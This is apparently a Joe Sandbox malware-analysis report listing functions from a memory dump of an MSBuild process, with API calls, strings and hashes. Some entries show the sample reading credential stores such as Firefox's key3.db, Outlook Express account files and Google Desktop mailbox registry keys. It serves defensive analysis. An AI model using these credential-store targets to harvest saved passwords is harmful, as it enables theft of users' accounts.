number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
unknown column "%s" in foreign key definition, xrefs: 00430C59

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 3510742995-272990098
Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98

Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0043D661
memset.MSVCRT ref: 0043D8A7

Strings

H, xrefs: 0043D71C

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset
String ID: H
API String ID: 2221118986-2852464175
Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98

Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?), ref: 00425748
memcpy.MSVCRT(?,?,?), ref: 00425763

Strings

string or blob too big, xrefs: 00425B2E
out of memory, xrefs: 00426747
statement aborts at %d: [%s] %s, xrefs: 00425B5F

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
API String ID: 3510742995-3170954634
Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98

Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C

memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47

Strings

SQLite format 3, xrefs: 0041DBCF
@ , xrefs: 0041DC41

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcmp$memcpy
String ID: @ $SQLite format 3
API String ID: 231171946-3708268960
Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98

Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000000), ref: 00414668
memcpy.MSVCRT(?,?,?), ref: 00414681
memset.MSVCRT ref: 004146AF

Strings

winWrite1, xrefs: 00414776
winWrite2, xrefs: 00414721

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memset
String ID: winWrite1$winWrite2
API String ID: 438689982-3457389245
Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99

Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?), ref: 00414540
memcpy.MSVCRT(?,?,?), ref: 0041455B
memset.MSVCRT ref: 00414579
memset.MSVCRT ref: 00414613

Strings

winRead, xrefs: 004145DB

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpymemset
String ID: winRead
API String ID: 1297977491-2759563040
Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9

Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0044955B
memset.MSVCRT ref: 0044956B
memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616

Strings

gj, xrefs: 00449570

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpymemset
String ID: gj
API String ID: 1297977491-4203073231
Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715

Function 0040AB66 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D

memset.MSVCRT ref: 0040AB9C

Part of subcall function 00411004: memcpy.MSVCRT(?,<,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072

Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E

sprintf.MSVCRT ref: 0040ABE1

Strings

<item>, xrefs: 0040AB70
</item>, xrefs: 0040ABFB
<%s>%s</%s>, xrefs: 0040ABD9

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 3337535707-2769808009
Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98

Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004090C2
GetWindowRect.USER32(?,?), ref: 004090CF
GetClientRect.USER32(00000000,?), ref: 004090DA
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5

Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1

Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70

SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4

Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C

SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
String ID:
API String ID: 2374668499-0
Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14

Function 0040AD38 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040AD5B
memset.MSVCRT ref: 0040AD71

Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D

Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E

sprintf.MSVCRT ref: 0040ADA8

Strings

<%s>, xrefs: 0040ADA2
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3699762281-1998499579
Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4

Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18

Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D

??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
free.MSVCRT ref: 00409B00

Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
Opcode Fuzzy Hash: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE

Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00407107: memset.MSVCRT ref: 00407127
Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C

SetBkMode.GDI32(?,00000001), ref: 0041079E
GetSysColor.USER32(00000005), ref: 004107A6
SetBkColor.GDI32(?,00000000), ref: 004107B0
SetTextColor.GDI32(?,00C00000), ref: 004107BE
GetSysColorBrush.USER32(00000005), ref: 004107C6

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Color$BrushClassModeNameText_strcmpimemset
String ID:
API String ID: 2775283111-0
Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58

Function 00405F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C

Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680

EndDeferWindowPos.USER32(?), ref: 0040602B
InvalidateRect.USER32(?,?,00000001), ref: 00406036

Strings

$, xrefs: 00406042

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: DeferWindow$Rect$BeginClientInvalidateItem
String ID: $
API String ID: 2498372239-3993045852
Opcode ID: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
Instruction ID: a7623898fd9bb087a7334f25a668ee6c33d9336bc772a6b4061b4b4824447eab
Opcode Fuzzy Hash: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
Instruction Fuzzy Hash: C7317070640259FFEB229B52CC89DAF3E7CEBC5B98F10402DF401792A1CA794F11E669

Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE

Strings

winSeekFile, xrefs: 00414824
winTruncate2, xrefs: 00414877
winTruncate1, xrefs: 0041483E

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: winSeekFile$winTruncate1$winTruncate2
API String ID: 885266447-2471937615
Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29

Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13

GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11

Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917

Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577

Strings

key3.db, xrefs: 00406ACC
Ul@, xrefs: 00406ACD

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: File$??2@??3@CloseCreateHandleReadSize
String ID: Ul@$key3.db
API String ID: 1968906679-1563549157
Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98

Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 0040E134
_strcmpi.MSVCRT ref: 0040E14D
_mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A

Strings

smtp, xrefs: 0040E194

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _strcmpi$_mbscpy
String ID: smtp
API String ID: 2625860049-60245459
Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98

Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF

memset.MSVCRT ref: 00408258

Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3

Strings

Software\Google\Google Desktop\Mailboxes, xrefs: 00408230

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Close$EnumOpenmemset
String ID: Software\Google\Google Desktop\Mailboxes
API String ID: 2255314230-2212045309
Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA

Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C28C
SetFocus.USER32(?,?), ref: 0040C314

Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265

Strings

S_@, xrefs: 0040C282
l, xrefs: 0040C2BC

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: FocusMessagePostmemset
String ID: S_@$l
API String ID: 3436799508-4018740455
Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9

Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004092C0
GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
_mbscpy.MSVCRT(?,?), ref: 004092FC

Strings

<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfileString_mbscpymemset
String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
API String ID: 408644273-3424043681
Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D

Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT(?,?), ref: 004074DA

Strings

X, xrefs: 004074A6
ini, xrefs: 004074C5
C^@, xrefs: 0040749C

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscpy
String ID: C^@$X$ini
API String ID: 714388716-917056472
Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59

Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011

CreateFontIndirectA.GDI32(?), ref: 0040101F
SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B

Strings

MS Sans Serif, xrefs: 0040100B

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
String ID: MS Sans Serif
API String ID: 3492281209-168460110
Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
